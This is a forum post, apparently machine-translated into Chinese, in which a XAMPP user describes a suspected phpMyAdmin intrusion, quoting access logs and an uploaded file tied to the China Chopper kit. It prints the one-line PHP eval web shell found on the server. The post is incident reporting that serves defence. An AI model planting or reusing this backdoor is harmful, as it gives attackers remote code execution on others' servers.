作者:山野木每子 | 来源:互联网 | 2022-12-31 09:21
好的,所以我相信我遇到了包含phpmyadmin 4.7.4的最新版XAMPP(php 7.2.1)的安全问题.
我在我的htdocs文件夹wuwu11.php中发现了一个包含1行的文件,如下所示
我查看了访问日志,发现了以下内容
27.155.87.26 - - [21/Jan/2018:22:04:52 -0600] "GET /phpmyadmin HTTP/1.1" 301 345 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:04:52 -0600] "GET /phpmyadmin/ HTTP/1.1" 200 13732 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:04:58 -0600] "POST /phpmyadmin/index.php?token=bb05b127303d97733437297fbadf3ec1 HTTP/1.1" 200 13191 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:04:59 -0600] "GET /phpmyadmin/index.php?token=bb05b127303d97733437297fbadf3ec1 HTTP/1.1" 200 13640 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:00 -0600] "GET /phpinfo.php HTTP/1.1" 401 1299 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:01 -0600] "GET /index.php HTTP/1.1" 401 1297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:02 -0600] "GET /dashboard/phpinfo.php HTTP/1.1" 401 1309 "-" "Mozilla/5.0 (Windows NT
6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:02 -0600] "GET /u.php?act=phpinfo HTTP/1.1" 401 1293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
27.155.87.26 - - [21/Jan/2018:22:05:03 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 368 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:05 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 9663 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:06 -0600] "POST /phpmyadmin/export.php HTTP/1.1" 500 888 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:07 -0600] "POST /phpmyadmin/import.php HTTP/1.1" 200 10223 "-" "Apache-HttpClient/4.4 (Java 1.5 minimum; Java/1.8.0_161)"
27.155.87.26 - - [21/Jan/2018:22:05:08 -0600] "GET /wuwu11.php HTTP/1.1" 401 1298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
最后一行以php文件结束,该文件似乎通过phpmyadmin/import.php上传
在我的研究中,我发现这与中国Chopper Hacking Kit有关.这些访问日志中的IP映射到中国,福建,福州
在WordPress网站上找到<?php @eval($ _ POST ['pass']);?>代码
幸运的是我将我的根目录设置为xampp中默认的htdocs文件夹以外的其他内容,否则我猜测攻击者能够执行代码,做一些损坏然后自行删除
想知道是否有人已经看到这个或有更多的见解,好像我是正确的,并且攻击者正在利用phpmyadmin